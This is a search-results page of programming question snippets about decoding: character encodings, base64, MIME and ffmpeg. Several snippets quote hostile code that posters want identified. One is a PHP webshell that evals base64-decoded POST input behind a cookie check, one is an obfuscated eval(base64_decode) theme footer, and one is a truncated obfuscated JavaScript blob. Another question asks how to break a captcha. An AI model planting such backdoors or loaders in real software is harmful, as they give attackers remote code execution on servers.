Search Results

Search found 368 results on 15 pages for 'decoding'.

Page 4/15 | < Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Decoding utf16 in Perl?

    - by Geo
    If I open a file ( and specify an encoding directly ) : open(my $file,"<:encoding(UTF-16)","some.file") || die "error $!\n"; while(<$file>) { print "$_\n"; } close($file); I can read the file contents nicely. However, if I do: use Encode; open(my $file,"some.file") || die "error $!\n"; while(<$file>) { print decode("UTF-16",$_); } close($file); I get the following error: UTF-16:Unrecognised BOM d at F:/Perl/lib/Encode.pm line 174 How can I make it work with decode?

    Read the article

  • Decoding http response with certificate

    - by Tim
    Hi all, I'm new to php and I need to authenticate to a SSO server. The SSO server is a .Net one, using a SSL certificate. When I go back from the SSO server, the response is encoded. I have the key of the certificate of course, but how could I decrypt the response ? This is very vague for me, don't hesitate to detail your answer :) Many thanks in advance for your help, best regards

    Read the article

  • Help decoding MSDN Dynamic Data Article

    - by davemackey
    I'm trying to run through this msdn article: http://msdn.microsoft.com/en-us/library/dd723645.aspx One of the steps is: In the class file for the page, change the base class from UserControl to EntityTemplateUserControl. Nowhere is it made clear what page is being referenced. Can someone help me? I don't see any relevant class in the pages I have, so I assumed maybe they were talking about the ascx and didn't really mean page, but I'm not seeing an option there either.

    Read the article

  • PHP hack files found - help decoding and identifying

    - by akc
    I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like: if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;} But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704 I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated. I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla Thanks!

    Read the article

  • Decoding international chars in AppEngine

    - by Irro
    I'm making a small project in Google AppEngine but I'm having problems with international chars. My program takes data from the user through the url "page.html?data1&data2..." and stores it for displaying later. But when the user are using some international characters like åäö it gets coded as %F4, %F5 and %F6. I assume it is because only the first 128(?) chars in ASCII table are allowed in http-requests. Is there anyone who has a good solution for this? Any simple way to decode the text? And is it better to decode it before I store the data or should I decode it when displaying it to the user.

    Read the article

  • decoding jquery json data in php

    - by Mac Taylor
    hey guys recenlty i made a script to move objects and save the orders now i have a little to do to finish this script everything works fine , just one question : how can i save not numeric data in my json script this is my script : function updateWidgetData(){ var items=[]; $('.widget-title').each(function(){ var weightId=$(this).attr('id'); $('.column').each(function(){ var columnId=$(this).attr('id'); $('.widget', this).each(function(i){ var collapsed=0; if($(this).find('.widget-inside').css('display')=="none") collapsed=1; //Create Item object for current panel var item={ id: $(this).attr('id'), collapsed: collapsed, order : i, column: columnId, weight: weightId }; //Push item object into items array items.push(item); }); }); }); //Assign items array to sortorder JSON variable var sortorder={ items: items }; //Pass sortorder variable to server using ajax to save state $.post('updatePanels.php', 'data='+$.toJSON(sortorder), function(response){ if(response=="success") $("#console").html('<div class="success">Saved</div>').hide().fadeIn(1000); setTimeout(function(){ $('#console').fadeOut(1000); }, 2000); }); } and this is my php script : $data=json_decode($_POST["data"]); foreach($data->items as $item) { //Extract column number for panel $col_id=preg_replace('/[^\d\s]/', '', $item->column); //Extract id of the panel $widget_id=preg_replace('/[^\d\s]/', '', $item->id); $sql="UPDATE widgets SET column_id='$col_id', sort_no='".$item->order."', collapsed='".$item->collapsed."' WHERE id='".$widget_id."'"; mysql_query($sql) or die('Error updating widget DB'); } echo "success"; everything works fine till i use numeric value for columns' id but i need non numeric values forexample id='columnr' i want to extract r but i cant get it right any help plz !?

    Read the article

  • Intger encoding and decoding problem

    - by aASDASD
    I have a long list of integers, and i need to reduce this down to a single integer. The integer list can be anywhere from 0 to 300 ints long (about). I need to be able to encode/decode. Is there a better option than a lookup table?

    Read the article

  • Decoding MIME (HTML+Attachments)

    - by MH
    I'm planning to write an application that should handle incoming mails. Basically it will act more like a ticketing system than a webmail, so I'm only interested in receiving emails, and not sending them. I have made a simple prototype that downloads mails and displays the text with downloadable attachments in a web page, but handling mails from Outlook and others is more complicated. I have looked at some of the open source ticketing systems out there, but most of the code is tied to the system and is hard to separate. Is there a library that understands "rich" mail and makes this job simpler? Preferably in Python, Java, Ruby or Perl. I'm also open to suggestions for any command line mail clients that can be used for this, since the system will not receive large amounts of mail and can afford to launch external processes.

    Read the article

  • URL decoding Japanese characters etc. in Java

    - by DanieL
    I have a servlet that receives some POST data. Because this data is x-www-form-urlencoded, a string such as ???? would be encoded to &#12469;&#12508;&#12486;&#12531;. How would I unencode this string back to the correct characters? I have tried using URLDecoder.decode("encoded string", "UTF-8"); but it doesn't make a difference. The reason I would like to unencode them, is because, before I display this data on a webpage, I escape & to &amp; and at the moment, it is escaping the &s in the encoded string so the characters are not showing up properly.

    Read the article

  • Decoding base64 php file

    - by James Wanchai
    I currently have an encoded footer file for a wordpress file I want to decode, because the theme author has put in some 'interesting' links. Don't get me wrong, I'm very happy to link back to the author, but gambling sites aren't really what I want! The file is this- <?php $o="QAAAOzh3b3cnbmlka3JjYicvUwAAQkpXS0ZTQldGU08nKScgKAEAZWhzc2hqKQJQIC48Jzg5Cg0AADtjbnEnZGtmdHQ6JWRrYmYGAHUlOTsoAUABtW5jOiVhaGhzYsCEAZAC62FqYmlyJQKAJztyawBya24AIDk7ZidvdWJhOiUIo2VraGBuAIBpYWgvIHJ1awczJTlPaGpiOzEAKGYGgAMQCg0nArNwd1hrbnRzWAAAd2ZgYnQvIHRodXNYZGhrchAAamk6BpFYaHVjYnUhY2J3c28Atjo2IXNuc2tiAxA6BVMJoCgIUgvDDiEACg0BIHR3ZmkNtWtiYXMlOScnAARDYnRuYGliYycnZX4nCtZvcwAAc3c9KChwcHApcGJlNWFiYgAAaylkaGolJ3NmdWBiczolWAa7ZWtmaWwEEAH5JwxRJwBgBpEQEDsAgQcVCMB1bmBvByFEaGMG7wbma2hkZmtqCSBmc2RvBwEoJQceS2gCECdDZnNuLDBpYAbxKwtfC1BoaWtuDVACYnVidGgODHJ1ZGIFHwwiBLMnU253dAUCEE9wKQBDam5ra25oaWZuHKBrbnVzBL8EsgQ3VHJgZnUJwGNjbmIE0hDIDhgwGMMYkPZBJQUp0h6AJQMvKCUpYGN+FAEob3NqaxpQAAAnJyc=";eval(base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;?> Would anyone be able to do me a huge favour and decode it, I've tried using Google but can't seem to do it right. Thank you!

    Read the article

  • ffmpeg hangs when creating a video

    - by FearUs
    I am trying to insert an audio channel with a video: first of all I extract the audio from the original video for processing: ffmpeg -i lotr.mp4 lotr.wav I then extract all frames for later processing too: ffmpeg -i lotr.mp4 -f image2 %d.jpg When done processing audio and video streams, I try to create the video ffmpeg -f image2 -r 15 -i %d.jpg new.mp4 then merge with the audio: ffmpeg -i new.mp4 -i lotr.wav -map 0:0 -map 1:0 new_w_audio.mp4 Result: CPU activity = 100%, the process hangs and never returns. PS: I even tried it without modifying the images or the audio (so just trying to unpack then repack the video) but still the same output FFmpeg version SVN-r26400, Copyright (c) 2000-2011 the FFmpeg developers built on Jan 18 2011 04:07:05 with gcc 4.4.2 configuration: --enable-gpl --enable-version3 --enable-libgsm --enable-libvorb is --enable-libtheora --enable-libspeex --enable-libmp3lame --enable-libopenjpeg --enable-libschroedinger --enable-libopencore_amrwb --enable-libopencore_amrnb --enable-libvpx --disable-decoder=libvpx --arch=x86 --enable-runtime-cpudetect - -enable-libxvid --enable-libx264 --enable-librtmp --extra-libs='-lrtmp -lpolarss l -lws2_32 -lwinmm' --target-os=mingw32 --enable-avisynth --enable-w32threads -- cross-prefix=i686-mingw32- --cc='ccache i686-mingw32-gcc' --enable-memalign-hack libavutil 50.36. 0 / 50.36. 0 libavcore 0.16. 1 / 0.16. 1 libavcodec 52.108. 0 / 52.108. 0 libavformat 52.93. 0 / 52.93. 0 libavdevice 52. 2. 3 / 52. 2. 3 libavfilter 1.74. 0 / 1.74. 0 libswscale 0.12. 0 / 0.12. 0 Input #0, mov,mp4,m4a,3gp,3g2,mj2, from 'new.mp4': Metadata: major_brand : isom minor_version : 512 compatible_brands: isomiso2mp41 creation_time : 1970-01-01 00:00:00 encoder : Lavf52.93.0 Duration: 00:00:29.66, start: 0.000000, bitrate: 193 kb/s Stream #0.0(und): Video: mpeg4, yuv420p, 200x134 [PAR 1:1 DAR 100:67], 192 k b/s, 15 fps, 15 tbr, 15 tbn, 15 tbc Metadata: creation_time : 1970-01-01 00:00:00 [wav @ 01fed010] max_analyze_duration reached Input #1, wav, from 'lotr.wav': Duration: 00:00:29.90, bitrate: 176 kb/s Stream #1.0: Audio: pcm_s16le, 11025 Hz, 1 channels, s16, 176 kb/s File 'new_w_audio.mp4' already exists. Overwrite ? [y/N] y [buffer @ 01b03820] w:200 h:134 pixfmt:yuv420p Output #0, mp4, to 'new_w_audio.mp4': Metadata: major_brand : isom minor_version : 512 compatible_brands: isomiso2mp41 creation_time : 1970-01-01 00:00:00 encoder : Lavf52.93.0 Stream #0.0(und): Video: mpeg4, yuv420p, 200x134 [PAR 1:1 DAR 100:67], q=2-3 1, 200 kb/s, 15 tbn, 15 tbc Metadata: creation_time : 1970-01-01 00:00:00 Stream #0.1: Audio: aac, 11025 Hz, 1 channels, s16, 64 kb/s Stream mapping: Stream #0.0 -> #0.0 Stream #1.0 -> #0.1 Press [q] to stop encoding

    Read the article

  • Identify Encoded Strings

    - by Steven
    Does anyone know of a utility (any OS or online) that, with a string input, identifies the encoding type (checksum, base64, etc) and if possible (and appropriate) decodes the string?

    Read the article

  • How do you get the glyph for a character encoded as '&#333;' from a utf-8 encoded database field usi

    - by AE
    I have a MySQL database table with a collation of 'utf8_general_ci' and the value in the field is: x & #299; bán yá wén (without the spaces). When this is converted (for example by StackOverflow's editor) it looks like this: xī bán yá wén where the second character looks like a lower case i with a bar over the top. In PHP, what function converts the & #299 ; entity into the ī character? I've tried using html_entity_decode($str,ENT_COMPAT,'UTF-8'), however I get characters like the following: yÄ«n wén or zhÅ•ng wén I'm pretty sure there's something I don't understand about the decoding, which is why I'm using the wrong function. Can anyone shed some light on how to get the single character glyph that's represented by the entity & #299 and similar high-number characters above 255? Many thanks, AE

    Read the article

  • Perf: Viewing thousands of images in Silverlight 3 on a 3D Wall

    - by Bob Holland
    I currently work on a very cool Silverlight app that displays photos in a 3D wall space like the Wall3D demo that is thrown in with Blend 3. The problem I am currently facing is performance. The app works like this: As you scroll right or left the 3d photo wall rotates As each movement is made, the next column of photos are downloaded, decoded into a BitmapImage and thrown into a 3D Wall Node. As you can imagine users (if you let them) will want to flip through the photos really quickly, but the problem I have is I cannot display the photos quick enough. In most cases it's a beautiful app that works really well, but when an album contains over 300 photos, you can imagine the sort of memory taken up by all the BitmapImage classes and how moving the slider can jump from photo 20 to photo 120 in a second. Of course we have algorithms in place to not download every photo in between, but I still can't work out a fast way to get the photos displayed. It may be a case that we need to throw away the 'great for show' 3D wall and go to a flat DeepZoom like wall like the Playboy archive one that Vertigo did. Still not sure, let me know your thoughts. P.S. We are using Kit3D for all the 3D work, it's using PerspectiveCamera, Model3DGroup, ModelVisual3D, RotateTransform3D & TranslateTransform3D. Cheers, Bob.

    Read the article

  • Breaking a captcha

    - by Fabiano PS
    What I'm looking for is a way to break this captcha: https://www.nfe.fazenda.gov.br/PORTAL/FormularioDePesquisa.aspx?tipoConsulta=completa Notice that the image alternates based on 2 types of images. Anyone knows a OCR (optical character recognition) 'damm good'for this? Other solutions also accepted (except proxing). I'm not looking for spamming, I just want to automatize my Software instead of proxing the image for the user. Nowhere in the site says it is forbidden to automatically parse the image.

    Read the article

  • Is this a good approach to address double-base64-encoding?

    - by Freiheit
    My software understands attachments, like PNGs attached to user records. These attachments are usually sent in from outside sources as a Base64 encoded string. The database stores whatever data it is given, Base64 encoded or not. When I serve up the attachment for download I do this: if (Base64.isBase64(data)) { data = Base64.decodeBase64(data); } There is a potential for data that is double encoded. For instance the sender of a message had base64 encoded data, then encoded it again when building the message to send to me. I think the following code would address that circumstance: while (Base64.isBase64(data)) { data = Base64.decodeBase64(data); } So if data is encoded multiple times, it would be decoded until its in its 'raw' state and then served up for download. Is this approach an acceptable way to address that problem? Ideally some sort of checking could happen at the edge when I receive attachment data, but that will take more time. This looping seems to be a faster way to do it. The 'Base64' library is Apache Commons: http://commons.apache.org/codec/apidocs/org/apache/commons/codec/binary/Base64.html I trust it to properly identify Base64 encoded data.

    Read the article

  • how to decode encoded javascript codes ?

    - by Ronnie Chester Lynwood
    hello. i got some code like this var xKsgbD = unescape('{var xWCknA %3d %27%2576a%2572%2520z%2562%2531%2538%2530%2537%2537d%2565%2565%2530%253Dz%2534%2564%25389%25322%25308%2563%2539%253Dz%2539%2539%25316%2537%25328%2565c%2561%253dz%2563%2562%2539%2535%25336%25634%2565%2536%253d%257A%2532%25656%2533b%25625%25620%2539%253d%257a5%2564d%25331%2531b%2561%2533c%253d%257a%2536e%25619%2539%25345%25630%2534%253D%2528%2530x%25380%2561%252b2%2531%2536%2535%252D0%25781%2530%2537f%2529%252c%257A%2537%2539%25641%2562%2538%2563%25624%2539%253D%2521%2570o%256C%256c%2569%2564%257C%257c%2521r%2561%2574%2565i%2564%253F%2528%2530x%2565%2536%252b%25378%25394%252d0%25781%2566%2562%2563%2529%253a%2528%2530x%2539c%2535%252B%2532%2533%2538%2534%252D%2530x%2531%25331%2534%2529%252Cz%2531%25300%25618%25393%2532d%2537%253d%2553t%2572%2569%256e%2567%252e%2566%2572o%256d%2543%2568%2561%2572%2543o%2564%2565%2528%2528%2530%25781%2534%2535+%25379%2530%252D%2530%25784%2532%2563%2529%2529%252C%257A%2563%2536%2538f%2563%2534%2531%2538%2533%2533%253DS%2574%2572i%256eg%252Ef%2572%256Fm%2543h%2561%2572C%256F%2564%2565%2528%2528%2530%2578%2531%25375%2563%252B%2533%25309%2535%252d0%2578%25323%2530b%2529%252c%2528%2530%2578%25310%2530%2537+%2532%25316%2531%252d0%25781%25380%2534%2529%252c%2528%2530%2578a%2563%2563+%25336%25345%252d0%2578%2531%2538%25395%2529%252c%25280%2578%2531f%2530%2538%252b%25335%2535%252D0%2578%2531f%2566b%2529%252C%25280%2578%2531%2533%25350%252b1%25353%2533%252d0%2578%2531%25391%2533%2529%252c%2528%2530%25781%2561%2539%2538%252B%25380%252D0%25781%2561b%2539%2529%252c%25280%25782%2531%2536+%2538%2530%2537%252D%2530%25785%2530%2565%2529%2529%252cz%2565%25656%25346%2531%25338%2536%2534%253DS%2574r%2569%256Eg%252Ef%2572o%256dC%2568a%2572%2543%256Fd%2565%2528%2528%2530x%25321%2533%2538+%25328%2538%252d%2530x%2532%2532%2532%2561%2529%2529%252c%257A%2536%2562%2561%2534%2531%25371%2530c%2539%253D%2553t%2572i%256E%2567%252E%2566r%256Fm%2543h%2561r%2543o%2564e%2528%2528%2530x%25314%2563%2533%252B%25369%2534%252d%2530%2578%25317%25316%2529%252c%25280%25781%25345%2562+%2531%2536%2539%252D0%25781%25349%2535%2529%252c%25280%2578%25618%2562+%2536%2533%25339%252d0%2578%2532%2532e%2531%2529%2529%252Cz%2533b%25302%2538a%2533%25371%2563%253d%2553%2574r%2569n%2567%252Ef%2572%256F%256d%2543%2568a%2572%2543o%2564%2565%2528%2528%2530%2578%25317%2533%2535%252B%2533%25367%2536%252D%2530x%25325%2531%2561%2529%252C%2528%2530x%2535%2564%2534%252b3%25395%2532%252D0%25781%2534c%2564%2529%252c%2528%2530x%2566%25623%252B%2531%2534%2535%2535%252d%2530%25781%2534%2565b%2529%2529%252C%257a%25346%2533%2538%2538b%2538%2566%25618%253D%2553t%2572%2569n%2567%252ef%2572o%256DC%2568%2561%2572C%256Fd%2565%2528%25280%2578%2534%2564%2537%252B%25312%25367%252d0%2578%2539%2538%2564%2529%2529%252cz%2566%2562a%2531%2565%25651%2562b%2535%253dS%2574r%2569%256eg%252Ef%2572o%256dC%2568%2561r%2543o%2564e%2528%2528%2530%25781%2535%2563%2537+%2533%2533%25334%252D0%25782%25328%2565%2529%2529%252c%257A%2563c%25637%2532%25354%2532d%2534%253D%2553t%2572%2569%256E%2567%252E%2566%2572%256F%256d%2543%2568a%2572%2543%256f%2564e%2528%2528%2530x%2564f%2535+%25362%2539%252D%2530x%2566f%2561%2529%252c%2528%2530x%25322%2565%2538%252B7%25327%252d0%2578%25325%2535%2537%2529%252c%25280%2578%2563%25326%252b6%2533%25378%252D%2530x%2532%2534a%2530%2529%2529%252c%257a%2563a%2532%25331%2538%2533%25307%2561%253d%2553%2574%2572%2569n%2567%252e%2566r%256f%256D%2543h%2561%2572%2543%256F%2564e%2528%25280%25781%2531%25636%252b%25337%25322%252D0%2578%25320%2532a%2529%2529%252C%257a%2537%2533%2561%25655%25386%25332%2564%253DS%2574r%2569n%2567%252ef%2572%256Fm%2543%2568%2561r%2543o%2564e%2528%25280%25782%2532%25652%252B%2534%2532%2538%252d%2530x%2532%25342%2566%2529%2529%252Cz%2564%25661%2562c%2536%2538%2534c%2562%253dS%2574r%2569n%2567%252e%2566r%256fm%2543%2568a%2572C%256fd%2565%2528%2528%2530%2578%2534%2566%2538+%2532%25351%2536%252D%2530x%2565%2535c%2529%252C%2528%2530x%25320%2532c%252B%2531%2531%2532%2530%252d%2530%2578%25324%2531d%2529%252c%2528%2530%25781%25302%2538%252B%2533%25364%2530%252d0%2578%2531%2564f%2534%2529%252c%25280%25782%25381%252b1%2538%2530%2535%252d%2530%2578%25392%2532%2529%252c%2528%2530x%25315%25632%252B%2537%25334%252d%2530%2578%2531%25383%2563%2529%252C%2528%2530x%2534f%2535%252B%25387%2533%2530%252D%2530%2578%25326%2561%2565%2529%252C%25280%2578%25379%2530%252B5%25356%2537%252D%2530x%2531%2563e%2562%2529%252C%25280%25789%2532%252b%25323%25354%252d0%2578%25396%2530%2529%252C%2528%2530%2578%25311%2532%2533%252b4%25322%2531%252D0%2578%25321%2532%2537%2529%2529%252cz%25668%2532b%2564d%2538b%25611%253DS%2574r%2569n%2567%252e%2566r%256F%256d%2543%2568%2561r%2543%256F%2564%2565%2528%2528%2530x%2561%2535c%252b2%2535%25362%252d0%25781%2533%2566a%2529%252C%2528%2530%2578%2531%2539%25639%252B%25312%2532%2531%252D0%25781%2565%25325%2529%252c%25280%2578%25390%2532%252B7%2532%25345%252d%2530x%25324%2564%2563%2529%252C%25280%2578%25635%2531%252b%25353%25397%252D0%2578%2532%2530f%2535%2529%252c%2528%2530%25786%2533c%252B6%25347%2531%252D0%25781%2566%2530e%2529%252C%2528%2530x%2531%25642%2538+%2535%2534%2530%252D%2530x%2531e%2564%2531%2529%2529%253b%2524%2528f%2575n%2563t%2569%256F%256e%2528%2529%257B%2524%2528%2522%255Cx%25323%255c%25787%2533%255cx%2537%2534%255cx%25361%255C%25787%2532%255C%25782%2530%255Cx%2536%2539%255c%25786%2564%255Cx%25367%2522%2529%252Ee%2572r%256F%2572%2528%2566%2575n%2563t%2569%256F%256e%2528%2529%257b%2524%2528%2574h%2569%2573%2529%252eu%256E%2562i%256E%2564%2528%2522%255c%25786%2535%255c%25787%2532%255Cx%2537%2532%255C%2578%2536f%255C%25787%2532%2522%2529%252ea%2574%2574r%2528%2522%255c%25787%2533%255C%25787%2532%255C%2578%25363%2522%252cz%25636%2538f%25634%2531%2538%25333%252B%2522%255cx%25373%255Cx%25332%2522%252B%257ae%25656%2534%25361%2533%2538%2536%2534%252b%2522%255Cx%25367%255cx%2536f%255cx%2536%2566%255c%2578%2536%2537%255cx%2536%2563%255C%2578%25365%255Cx%2537%2535%255cx%25373%255Cx%25365%255cx%2537%2532%255c%2578%2536%2533%255cx%2536%2566%255c%2578%2536%2565%255c%25787%2534%255Cx%25365%255cx%2536e%255C%2578%2537%2534%2522+%257A%2565e%2536%2534%25361%2533%2538%25364%252Bz%2536b%2561%25341%25371%2530%2563%2539%252Bz%2531%2530%2530%2561%25389%2533%2532d%2537%252B%2522%255c%25787%2533%255c%2578%2533%2532%2522%252Bz%2531%25300%2561%2538%25393%2532d%2537+%2522%255c%25786%2536%255Cx%2536%2531%255c%25787%2536%255Cx%25369%255c%2578%2536%2533%255Cx%2536f%255c%25786%2565%255c%25787%2533%2522%2529%253b%257d%2529%253B%2524%2528%2522%255C%2578%2532%2533%255Cx%25361%255c%2578%25364%255C%25786%2534%255Cx%2537%2532%255cx%25365%255cx%25373%255C%25787%2533%2522%2529%252ep%2572%2565p%2565n%2564%2528%2522%255C%2578%2533c%255Cx%25373%255C%25787%2534%255C%25787%2532%255c%25786%2566%255cx%2536e%255cx%25367%255c%2578%2533e%255c%2578%2534%2563%255cx%2536f%255c%25786%2531%255c%2578%2536%2534%255c%25786%2539%255c%25786%2565%255cx%2536%2537%255c%2578%2533%2561%255c%25783%2563%255cx%2532%2566%255C%2578%25373%255C%25787%2534%255c%2578%25372%255c%25786%2566%255C%25786%2565%255C%25786%2537%255Cx%2533e%255c%25782%2530%2522%2529%252e%2573%2568%256f%2577%2528%2529%252e%2561d%2564%2543l%2561%2573%2573%2528%2522%255C%25786%2563%255C%2578%2536f%255cx%25361%255C%25786%2534%255c%2578%25369%255c%25786%2565%255Cx%2536%2537%2522%2529%253b%2524%2528%2522%255cx%2536%2532%255C%25786%2566%255C%25786%2534%255cx%25379%2522%2529%252e%2561%2570p%2565%256e%2564%2528%2522%255Cx%2533%2563%255C%2578%25364%255C%2578%25369%255c%25787%2536%255cx%2532%2530%255C%2578%25369%255Cx%25364%255Cx%2533d%255Cx%25322%255C%25786%2533%255C%25786%2566%255cx%2536d%255c%25786%2564%255Cx%25365%255c%25786%2565%255cx%2537%2534%255cx%2537%2533%255Cx%25322%255c%25783%2565%255c%25783%2563%255Cx%2532%2566%255C%2578%25364%255cx%2536%2539%255Cx%25376%255C%25783%2565%255cx%2533%2563%255Cx%25364%255cx%25369%255Cx%2537%2536%255Cx%2532%2530%255C%2578%25369%255C%25786%2534%255C%25783%2564%255C%2578%2532%2532%255Cx%2537%2533%255Cx%2536%2533%255Cx%2537%2532%255Cx%2536f%255Cx%2536c%255C%2578%2536%2563%255C%2578%2532%2532%255C%25782%2530%255cx%25374%255cx%2536%2539%255Cx%25374%255Cx%2536%2563%255cx%25365%255c%25783%2564%255cx%2532%2532%255c%25785%2533%255cx%25363%255C%25787%2532%255C%25786%2566%255c%2578%2536c%255C%25786%2563%255cx%25320%255c%25784%2534%255C%2578%2536%2566%255Cx%25377%255C%2578%2536%2565%255Cx%25322%255Cx%2533%2565%255Cx%2532%2536%255C%25782%2533%255cx%2533%2539%255c%2578%2533%2536%255cx%2533%2536%255cx%2533%2530%255Cx%2533%2562%255cx%2533%2563%255c%25782%2566%255c%25786%2534%255C%25786%2539%255cx%2537%2536%255c%2578%2533%2565%2522%2529%253b%2524%2528%2522%255C%2578%2532%2533%255cx%2537%2534%255c%25786%2566%255c%25787%2530%2522%2529%252ea%2570p%2565%256E%2564%2528%2522%255c%2578%2533c%255C%2578%2536%2534%255cx%2536%2539%255Cx%25376%255c%25782%2530%255Cx%25369%255cx%25364%255c%25783%2564%255Cx%2532%2532%255Cx%25373%255Cx%2536%2538%255Cx%25361%255Cx%25372%255cx%2536%2535%255Cx%25331%255cx%2532%2532%255cx%2533e%255cx%25342%255c%2578%2536f%255c%2578%2536f%255Cx%2536%2562%255C%25786%2564%255c%2578%2536%2531%255C%2578%2537%2532%255cx%2536%2562%255c%2578%25320%255C%2578%2532%2536%255c%25782%2530%255C%25785%2533%255c%2578%2536%2538%255c%25786%2531%255C%25787%2532%255Cx%25365%255c%2578%2533%2563%255Cx%2532%2566%255Cx%25364%255c%2578%25369%255Cx%2537%2536%255C%2578%2533e%255C%2578%2533c%255c%2578%2536%2534%255C%25786%2539%255C%25787%2536%255C%2578%25320%255cx%25369%255c%2578%2536%2534%255Cx%2533d%255C%2578%2532%2532%255C%25787%2533%255C%25786%2538%255c%2578%2536%2531%255cx%25372%255Cx%25365%255c%25783%2532%255Cx%2532%2532%255cx%2533%2565%255Cx%2533c%255cx%2532f%255c%2578%2536%2534%255Cx%2536%2539%255Cx%2537%2536%255C%25783%2565%2522%2529%253Bi%2566%2528%257a7%2539d%2531b%2538c%2562%25349%2529%257b%2524%2528%2522%255c%25782%2533%255Cx%25364%255C%25786%2563%255C%25786%2531%255c%2578%25364%2522%2529%252ea%2566t%2565%2572%2528%2522%255Cx%2533c%255cx%2536%2534%255cx%2536%2539%255cx%25376%255Cx%2532%2530%255C%2578%25369%255c%2578%25364%255C%25783%2564%255c%2578%25322%255Cx%25372%255c%2578%2536%2531%255C%2578%25374%255C%25786%2535%255C%25782%2532%255C%25783%2565%255c%25782%2536%255Cx%2532%2533%255C%2578%25339%255c%2578%25336%255C%2578%2533%2536%255c%2578%25330%255c%25783%2562%255Cx%2532%2530%255Cx%2535%2532%255Cx%25361%255c%2578%25374%255C%25786%2535%255c%25782%2530%255cx%25374%255cx%2536%2538%255C%25786%2539%255C%2578%2537%2533%255Cx%2532%2530%255C%25784%2534%255c%25786%2566%255C%2578%2537%2537%255c%2578%2536e%255C%25786%2563%255C%2578%2536f%255Cx%25361%255c%25786%2534%255c%2578%2533%2563%255c%25782%2566%255Cx%2536%2534%255cx%2536%2539%255c%25787%2536%255Cx%2533e%255C%2578%2533c%255C%2578%2536%2534%255C%25786%2539%255cx%2537%2536%255cx%2532%2530%255cx%25369%255Cx%25364%255cx%2533d%255c%25782%2532%255c%25787%2534%255c%25786%2538%255C%25787%2535%255cx%2536d%255cx%25362%255c%2578%25373%255c%25782%2532%255c%2578%25320%255cx%2536%2533%255C%25786%2563%255cx%2536%2531%255C%2578%25373%255Cx%25373%255cx%2533d%255Cx%2532%2532%255C%2578%25365%255c%2578%2536%2565%255c%25786%2531%255cx%2536%2532%255c%2578%2536c%255C%25786%2535%255cx%25364%255c%2578%25322%255Cx%2533e%255Cx%2533%2563%255c%25782%2566%255cx%25364%255cx%2536%2539%255cx%25376%255cx%2533e%255cx%2533%2563%255cx%25364%255C%25786%2539%255Cx%25376%255cx%25320%255C%